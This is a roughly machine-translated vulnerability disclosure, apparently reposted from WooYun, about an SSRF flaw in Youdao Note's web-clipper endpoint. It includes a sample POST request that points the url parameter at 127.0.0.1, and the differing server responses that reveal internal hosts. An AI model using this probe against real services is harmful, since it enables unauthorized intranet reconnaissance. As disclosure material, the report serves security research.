Netease SSRF can detect the Intranet

Source: Internet
Author: User

Netease SSRF can detect the Intranet

Vulnerability URL: http://note.youdao.com/memory? Url = http://www.wooyun.org (register for login if you need)


Where the body is previewed

<meta name="description" content=""/>

Content as a display



Track the jump of a webpage
 

POST /yws/open/memory?method=content HTTP/1.1Host: note.youdao.comProxy-Connection: keep-aliveContent-Length: 20Accept: application/json, text/javascript, */*Origin: http://note.youdao.comX-Requested-With: XMLHttpRequestCookie: url=http://127.0.0.1

(The parameters have been reduced. Please capture packets by yourself)





The unattainable result based on the URL address is similar to the following:

Arrival:
 

HTTP/1.1 200 OKServer: TengineDate: Wed, 14 Jan 2015 15:38:44 GMTContent-Type: text/json; charset=UTF-8Content-Length: 41Connection: closePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 01 Jan 1970 00:00:00 GMTContent-Language: zh-CNCache-Control: no-cache{"content":"","title":null,"type":"NONE"}

(For example, content is displayed on the content Intranet. If no content exists and no address exists, you can test www.wooyun.org -- with content www.baidu.com -- without content)



If not:
 

HTTP/1.1 500 Internal Server ErrorServer: TengineDate: Thu, 15 Jan 2015 00:57:34 GMTContent-Type: text/json; charset=UTF-8Content-Length: 157Connection: closeRES-CODE: 213Pragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 01 Jan 1970 00:00:00 GMTContent-Language: zh-CN{"message":"Message[DATA_TRANSMISSION_FAILURE]: Page Clipper Exception, URL=http://127.0.0.1","canTryAgain":false,"scope":"PREVIOUS_EXCEPTION","error":"213"}






 






 






 

 

Solution:

Filtering and Restriction

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.